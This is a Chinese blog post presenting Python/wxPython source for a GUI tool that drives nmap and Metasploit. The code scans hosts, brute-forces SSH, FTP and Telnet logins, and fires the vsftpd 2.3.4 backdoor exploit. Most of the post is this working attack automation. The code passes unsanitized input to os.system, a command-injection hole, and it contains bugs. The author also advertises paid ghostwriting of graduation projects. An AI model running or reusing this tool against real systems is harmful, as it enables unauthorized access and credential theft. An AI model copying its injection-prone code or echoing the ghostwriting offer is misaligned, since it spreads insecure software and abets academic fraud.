python3 + wxpython 实现基于 metasploit 的安全扫描工具

版权声明:本文为博主原创连载文章,为了内容连贯性,未经博主允许不得转载。 https://blog.csdn.net/Kevinhanser/article/details/81365156

python3 + wxpython 实现 基于 metasploit 的安全扫描工具


2018年8月2日17:02:00 【原创】
目录:python 编程博客 索引

1. 运行环境

最近打算使用 python3 写一个图形化的氨曲南扫描工具,主要使用 metasploit

另外我的环境使用了 wxpython 图形化模块,安装方法也很简单

pip install wxpython

wxpython 已经更新到版本 4.0 了,在这里的小软件中的环境是可以兼容使用的

系统运行环境为 kali linux 2018

代码写的仓促,实现的功能很应付,所以如果有人需要参考的话,还需要大量改动的。
本来是想用 metasploit 带的 API 接口编写的,后来发现有点复杂,没找到相关的文档,时间关系,用一天时间完成的这个代码,没有优化。

最近写毕设的同学问的有点多,我把框架图贴出来仅供参考
在这里插入图片描述在这里插入图片描述在这里插入图片描述
有代写毕业设计软件的可以在评论里翻我的联系方式,不贵。我写过的部分毕业设计在博客连接中有。


2. 功能简介

1. 读取 IP 和端口
2. 主机扫描、密码破解、漏洞扫描
  1. 主界面

    在这里插入图片描述

    主机扫描模块

    在这里插入图片描述

    密码破解模块

    在这里插入图片描述

    漏洞扫描模块

    在这里插入图片描述

    下载链接

    脚本文件下载链接

3. 程序代码

# coding:UTF-8
import wx
import os
tc1data = 0
tc2data = 0
tc3data = 0
class MultiTextFrame(wx.Frame):
    def __init__(self):
        wx.Frame.__init__(self, None, -1, u"基于Metasploit的安全评估系统",size=(500, 220))
        panel = wx.Panel(self, -1)
        font = wx.Font(12, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        font.SetPointSize(14)
        font2 = wx.Font(12, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add((-1, 20))
        hbox1 = wx.BoxSizer(wx.HORIZONTAL)
        st1 = wx.StaticText(panel, label=u'目标地址')
        st1.SetFont(font2)
        hbox1.Add(st1, flag=wx.RIGHT, border=10)
        self.tc1 = wx.TextCtrl(panel, value = "10.10.10.137",size=(100,30),style=wx.TE_MULTILINE | wx.TE_RICH2) # wx.HSCROLL 不自动换行
        self.tc1.SetFont(font2)
        hbox1.Add(self.tc1, proportion=1)
        vbox.Add(hbox1, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=15)
        hbox3 = wx.BoxSizer(wx.HORIZONTAL)
        st2 = wx.StaticText(panel, label=u'目标端口')
        st2.SetFont(font2)
        hbox3.Add(st2,flag=wx.LEFT, border=10)
        self.tc2 = wx.TextCtrl(panel, value = "20-80",size=(100,30),style=wx.TE_MULTILINE | wx.TE_RICH2) # wx.HSCROLL 不自动换行
        self.tc2.SetFont(font2)
        hbox3.Add(self.tc2, proportion=1,flag=wx.LEFT, border=15)
        st3 = wx.StaticText(panel, label=u'本地端口')
        st3.SetFont(font2)
        hbox3.Add(st3,flag=wx.LEFT, border=100)
        self.tc3 = wx.TextCtrl(panel, value ="4444",size=(100,30),style=wx.TE_MULTILINE | wx.TE_RICH2 ) # wx.HSCROLL 不自动换行
        self.tc3.SetFont(font2)
        hbox3.Add(self.tc3, proportion=1,flag=wx.LEFT, border=10)
        vbox.Add(hbox3, proportion=0, flag=wx.LEFT | wx.RIGHT,border=10)
        vbox.Add(hbox3, flag=wx.ALIGN_CENTER_HORIZONTAL|wx.BOTTOM| wx.RIGHT, border=15)
        hbox5 = wx.BoxSizer(wx.HORIZONTAL)
        btn1 = wx.Button(panel, label=u'主机扫描', size=(100, 30))
        btn1.SetFont(font)
        hbox5.Add(btn1)
        btn2 = wx.Button(panel, label=u'密码破解', size=(100, 30))
        btn2.SetFont(font)
        hbox5.Add(btn2, flag=wx.LEFT | wx.BOTTOM, border=30)
        btn3 = wx.Button(panel, label=u'漏洞扫描', size=(100, 30))
        btn3.SetFont(font)
        hbox5.Add(btn3, flag=wx.LEFT | wx.BOTTOM, border=30)
        vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL  | wx.RIGHT, border=10)
        panel.SetSizer(vbox)
        self.Bind(wx.EVT_BUTTON, self.hostScan, btn1)
        self.Bind(wx.EVT_BUTTON, self.keyScan, btn2)
        self.Bind(wx.EVT_BUTTON, self.vulnScan, btn3)
    def hostScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        tc1data = self.tc1.GetValue()
        tc2data = self.tc2.GetValue()
        tc3data = self.tc3.GetValue()
        self.frame1 = Frame1(tc1data)
        self.frame1.Show()
        return True
    def keyScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        tc1data = self.tc1.GetValue()
        tc2data = self.tc2.GetValue()
        tc3data = self.tc3.GetValue()
        self.frame2 = Frame2(tc1data)
        self.frame2.Show()
        return True
    def vulnScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        tc1data = self.tc1.GetValue()
        tc2data = self.tc2.GetValue()
        tc3data = self.tc3.GetValue()
        self.frame3 = Frame3(tc1data)
        self.frame3.Show()
        return True
class Frame1(wx.Frame):
    def __init__(self,tc1data,parent = None,id = -1, pos = wx.DefaultPosition,title = u"主机扫描",size=(400,200)):
        wx.Frame.__init__(self,parent,id,title,pos,(400,200))
        panel = wx.Panel(self, -1)
        font = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        fontbt = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        fontms = wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False)
        font.SetPointSize(9)
        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add((-1, 5))  
        hbox3 = wx.BoxSizer(wx.HORIZONTAL)
        st2 = wx.StaticText(panel, label=u'结果')
        st2.SetFont(font)
        hbox3.Add(st2,flag=wx.RIGHT, border=10) #密文区域左空间
        self.tc2 = wx.TextCtrl(panel, size=(400,30),style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL | wx.TE_READONLY) # wx.HSCROLL 不自动换行
        self.tc2.SetFont(fontms)
        hbox3.Add(self.tc2, proportion=1, flag=wx.EXPAND)
        vbox.Add(hbox3, proportion=1, flag=wx.LEFT | wx.RIGHT |wx.EXPAND,border=10)    #密文区域右空间
        hbox5 = wx.BoxSizer(wx.HORIZONTAL)
        btn1 = wx.Button(panel, label=u'主机扫描', size=(80, 30))
        btn1.SetFont(font)
        hbox5.Add(btn1, flag=wx.LEFT , border=15)
        btn2 = wx.Button(panel, label=u'端口扫描', size=(80, 30))
        btn2.SetFont(font)
        hbox5.Add(btn2, flag=wx.LEFT ,border=15)
        btn3 = wx.Button(panel, label=u'指纹扫描', size=(80, 30))
        btn3.SetFont(font)
        hbox5.Add(btn3, proportion=0,flag=wx.RIGHT|wx.LEFT, border=15)
        vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL, border=30)
        vbox.Add((-1, 15)) 
        panel.SetSizer(vbox)
        self.Bind(wx.EVT_BUTTON, self.hostScan, btn1)
        self.Bind(wx.EVT_BUTTON, self.portScan, btn2)
        self.Bind(wx.EVT_BUTTON, self.fingerScan, btn3)
    def hostScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        scan1 = 'hostscan.txt'
        os.system('nmap -sS %s -p %s> %s' % (tc1data,tc2data,scan1))
        fo = open('tcpscan.txt')
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
    def portScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        scan2 = 'portscan.txt'
        os.system('nmap -sU -sS %s -p %s > %s' % (tc1data,tc2data,scan2))
        fo = open(scan2)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
    def fingerScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        scan3 = 'fingerscan.txt'
        os.system('nmap -v -A %s -p %s > %s' % (tc1data,tc2data,scan3))
        fo = open('tcpscan.txt')
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
class Frame2(wx.Frame):
    def __init__(self,tc1data,parent = None,id = -1, pos = wx.DefaultPosition,title = u"密码破解",size=(400,200)):
        wx.Frame.__init__(self,parent,id,title,pos,(400,200))
        panel = wx.Panel(self, -1)
        font = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        fontbt = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        fontms = wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False)
        font.SetPointSize(9)
        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add((-1, 5))  
        hbox3 = wx.BoxSizer(wx.HORIZONTAL)
        st2 = wx.StaticText(panel, label=u'结果')
        st2.SetFont(font)
        hbox3.Add(st2,flag=wx.RIGHT, border=10) 
        self.tc2 = wx.TextCtrl(panel, size=(400,30),style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL| wx.TE_READONLY) # wx.HSCROLL 不自动换行
        self.tc2.SetFont(fontms)
        hbox3.Add(self.tc2, proportion=1, flag=wx.EXPAND)
        vbox.Add(hbox3, proportion=1, flag=wx.LEFT | wx.RIGHT |wx.EXPAND,border=10)   
        hbox5 = wx.BoxSizer(wx.HORIZONTAL)
        btn1 = wx.Button(panel, label=u'SSH', size=(80, 30))
        btn1.SetFont(font)
        hbox5.Add(btn1, flag=wx.LEFT , border=15)
        btn2 = wx.Button(panel, label=u'FTP', size=(80, 30))
        btn2.SetFont(font)
        hbox5.Add(btn2, flag=wx.LEFT ,border=15)
        btn3 = wx.Button(panel, label=u'TELNET', size=(80, 30))
        btn3.SetFont(font)
        hbox5.Add(btn3, proportion=0,flag=wx.RIGHT|wx.LEFT, border=15)
        vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL, border=30) 
        vbox.Add((-1, 15)) 
        panel.SetSizer(vbox)
        self.Bind(wx.EVT_BUTTON, self.sshB, btn1)
        self.Bind(wx.EVT_BUTTON, self.ftpB, btn2)
        self.Bind(wx.EVT_BUTTON, self.telnetB, btn3)
    def sshB(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        resfile = 'sshBfile.rb'
        fo = open(resfile ,'w')
        res = 'use auxiliary/scanner/ssh/ssh_login \n \
            set RHOSTS %s \n \
            set STOP_ON_SUCCESS true \n \
            set USERNAME root\n \
            set PASS_FILE pass.txt \n \
            exploit \n \
            sessions -l \n \
            exit -y' % (RHOST)
        fo.write(res)
        fo.close()
        bruter1 = 'ssh_login.txt'
        os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
        fo = open(bruter1)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
    def ftpB(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        resfile = 'ftpBfile.rb'        
        fo = open(resfile ,'w')
        res = 'use auxiliary/scanner/ftp/ftp_login \n \
            set RHOSTS %s\n \
            set STOP_ON_SUCCESS true \n \
            set USERNAME anonymous\n \
            set PASS_FILE pass.txt \n \
            exploit \n \
            exit' % (RHOST)
        fo.write(res)
        fo.close()
        bruter1 = 'ftp_login.txt'
        os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
        fo = open(bruter1)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
    def telnetB(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        resfile = 'telnetBfile.rb'        
        fo = open(resfile ,'w')
        res = 'use auxiliary/scanner/telnet/telnet_login \n \
            set RHOSTS %s \n \
            setet STOP_ON_SUCCESS true \n \
            set USERNAME root\n \
            set PASS_FILE pass.txt \n \
            exploit \n \
            sessions -l \n \
            exit -y' % (RHOST)
        fo.write(res)
        fo.close()
        bruter1 = 'telnet_login.txt'
        os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
        fo = open(bruter1)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
class Frame3(wx.Frame):
    def __init__(self,tc1data,parent = None,id = -1, pos = wx.DefaultPosition,title = u"漏洞扫描",size=(400,200)):
        wx.Frame.__init__(self,parent,id,title,pos,(400,200))
        panel = wx.Panel(self, -1)
        font = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        fontbt = wx.Font(9, wx.ROMAN, wx.NORMAL, wx.BOLD, False)
        fontms = wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False)
        font.SetPointSize(9)
        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add((-1, 5))  
        hbox3 = wx.BoxSizer(wx.HORIZONTAL)
        st2 = wx.StaticText(panel, label=u'漏洞')
        st2.SetFont(font)
        hbox3.Add(st2,flag=wx.RIGHT, border=10) 
        self.tc2 = wx.TextCtrl(panel, size=(400,30),style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL| wx.TE_READONLY) # wx.HSCROLL 不自动换行
        self.tc2.SetFont(fontms)
        hbox3.Add(self.tc2, proportion=1, flag=wx.EXPAND)
        vbox.Add(hbox3, proportion=1, flag=wx.LEFT | wx.RIGHT |wx.EXPAND,border=10)    
        hbox5 = wx.BoxSizer(wx.HORIZONTAL)
        btn1 = wx.Button(panel, label=u'漏洞扫描', size=(80, 30))
        btn1.SetFont(font)
        hbox5.Add(btn1, flag=wx.LEFT , border=15)
        btn2 = wx.Button(panel, label=u'漏洞利用', size=(80, 30))
        btn2.SetFont(font)
        hbox5.Add(btn2, flag=wx.LEFT ,border=15)
        btn3 = wx.Button(panel, label=u'查看报告', size=(80, 30))
        btn3.SetFont(font)
        hbox5.Add(btn3, proportion=0,flag=wx.RIGHT|wx.LEFT, border=15)
        vbox.Add(hbox5, flag=wx.ALIGN_CENTER_HORIZONTAL, border=30) 
        vbox.Add((-1, 15))  
        panel.SetSizer(vbox)
        self.Bind(wx.EVT_BUTTON, self.vulnScan, btn1)
        self.Bind(wx.EVT_BUTTON, self.vulnExploit, btn2)
        self.Bind(wx.EVT_BUTTON, self.vulnReport, btn3)
    def vulnScan(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        nmap_s = 'nmap_s.log'
        os.system('nmap -sT -Pn -v --script tftp-enum.nse,teamspeak2-version.nse,afp-path-vuln.nse,ftp-vuln-cve2010-4221.nse,\
        http-huawei-hg5xx-vuln.nse,http-iis-webdav-vuln.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,\
        http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3192.nse,\
        http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,\
        http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,\
        http-vuln-cve2014-2129.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,\
        http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,\
        http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,\
        http-vuln-wnr1000-creds.nse,mysql-vuln-cve2012-2122.nse,rdp-vuln-ms12-020.nse,rmi-vuln-classloader.nse,\
        rsa-vuln-roca.nse,samba-vuln-cve-2012-1182.nse,smb2-vuln-uptime.nse,smb-vuln-conficker.nse,\
        smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,\
        smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,\
        smb-vuln-regsvc-dos.nse,smtp-vuln-cve2010-4344.nse,smtp-vuln-cve2011-1720.nse,smtp-vuln-cve2\
        011-1764.nse %s > %s' % (tc1data,nmap_s))
        fo = open(nmap_s)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
        resfile = 'vulnScan.rb'
        reportID = '454ceae9-0f50-4c7a-a289-69c8bf084958'
        targetID = 'df3b1968-4b86-40b8-b415-aa9773f08980'
        fo = open(resfile ,'w')
        res = 'load openvas \n \
            openvas_connect admin password 127.0.0.1 9390 ok \n \
            openvas_task_list \n \
            openvas_report_download %s c402cc3e-b531-11e1-9163-406186ea4fc5 . report_test.txt \n \
            exit -y' % (reportID)        
        fo.write(res)
        fo.close()        
        bruter1 = 'load_openvas.txt'
        os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
        fo = open(bruter1)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
    def vulnExploit(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        resfile = 'vsftpd_234.rb'
        fo = open(resfile ,'w')
        res = 'use exploit/unix/ftp/vsftpd_234_backdoor\n \
            set RHOST %s \n \
            exploit -j \n \
            use auxiliary/scanner/ssh/ssh_login\n \
            set RHOSTS %s\n \
            set STOP_ON_SUCCESS true\n \
            set USERNAME root\n \
            set PASS_FILE pass.txt\n \
            exploit\n \
            exit -y' % (RHOST,RHOST)
        fo.write(res)
        fo.close()
        bruter1 = 'vulnExploit.txt'
        os.system('msfconsole -r %s -q > %s' % (resfile,bruter1))
        fo = open(bruter1)
        tcpscanmsg = fo.read()
        fo.close()
        self.tc2.AppendText(tcpscanmsg)
    def vulnReport(self, event):
        global tc1data
        global tc2data
        global tc3data
        RHOST = tc1data
        RPROT = tc2data
        LPORT = tc3data
        os.system('sed -n 34,40p report.txt > tmp.txt')
        fo = open('tmp.txt')
        reportmsg = fo.read()
        fo.close()
        self.tc2.AppendText(reportmsg)
        os.system('evince report_test.pdf')
class MyApp(wx.App):
    def __init__(self):
        wx.App.__init__(self, redirect=False, filename=r"./IO.txt")
    def OnInit(self):
        frame = MultiTextFrame()
        frame.Show(True)
        return True
def main():
    app = MyApp()
    app.MainLoop()


if __name__ == "__main__":
    main()
展开阅读全文

没有更多推荐了,返回首页